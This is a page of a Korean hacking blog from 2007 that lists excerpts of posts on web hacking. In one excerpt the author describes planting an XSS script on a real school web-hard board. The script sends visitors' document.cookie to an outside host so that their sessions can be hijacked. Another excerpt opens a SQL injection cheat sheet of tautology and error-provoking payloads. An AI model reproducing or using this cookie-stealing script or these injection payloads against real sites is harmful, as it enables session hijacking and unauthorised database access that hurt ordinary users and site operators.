전체 글847 JSP 기반의 Web hacking 방법 ┏┳━┳┳━━┳━━━┳━━━┳━━━┳━┳━┳━┳━┳━━━┓ ┃┃ ┃┃ ┃ ━┫ ━┫ ┃ ┃ ┃ ┃ ┃ ━╋┓ ┃ ┃ ┃ ┃ ┃ ┏━┫ ┃ ┃ ┃┃ ┃ ┃ ┣━ ┃ ━┫ ┃ ┣┓ ┏╋━ ┃┃ ┣━━━┻━━┻━━━┻━━━┻━━━┻━━━┛┗━┛┗━━━┫┃ ┃Since 2002. W / I / S / E / G / U / Y / S in HackerSchool ┃┃ ┃http://research.hackerschool.org wiseguys@hackerschool.org ┃┃ ┗┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛┃ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ ━[Document Infomation] ━━━━━━━━━━━━━━━━━━━━━ :: Title :: jsp 기반의 w.. 2007. 3. 31. XSS - 실전사용예제 흔히 XSS 공격을 할때 가장 중요한건 상대방의 session_id가 소멸 되기 전에 자신의 session_id를 상대방 걸로 바꿔 치는건데, 계속 메일창만 드려다 볼수는 없는 노릇임으로, 적절한 작전이 필요한데, 최상의 방법은 바로 MSN 메일을 쓰는 것이다. MSN 메신져를 켜둔 상태에서 MSN 메일에 새로운 메일이 도착하면 알려주는 서비스를 이용해 우리는 신속하게 session_id를 사용할 수 있게 된다. 실제로 학교 웹하드 게시판에 이렇게 글을 적어 두었다. 제목 : 우와 진짜 끝내 주네요! 내용 : 이젠 웹링크도 지원되고 정말 좋은거 같습니다!! i.location="http://rvc.muz.ro/1.php?c="+document.cookie 스크립트가 들어갔지만 실제로 화면으론 다음과 같이.. 2007. 3. 31. Down it 2007. 3. 31. Netview 2007. 3. 30. Netcat 을 이용한 웹해킹 넷캣사용법을 잘모르시는분들에겐 유용하겠네요 2007. 3. 28. SQL Injection Code 정리 SQL Injection은 각 DB와 개발 언어에서 사용하는 SQL 언어에 따라 다소 차이가 납니다만, 나름 정리된 자료 올립니다. 그럼, 공부에 참고하시길.... =========================================================================================== 1. 일반적인 SQL Injection 1 OR 1=1 1' OR '1'='1 '1 OR '1=1 -- ' or 1=1 ; -- ' or 1=1 -- A' or 'A'='A 2. Blind SQL Injection 시 현재 사용 중인 Encapsulating Quites를 알아 내기 위한 에러 유발 1'1 3. EXEC를 사용하여 에러를 유발하는 Blind SQL Injection.. 2007. 3. 24. 이전 1 ··· 129 130 131 132 133 134 135 ··· 142 다음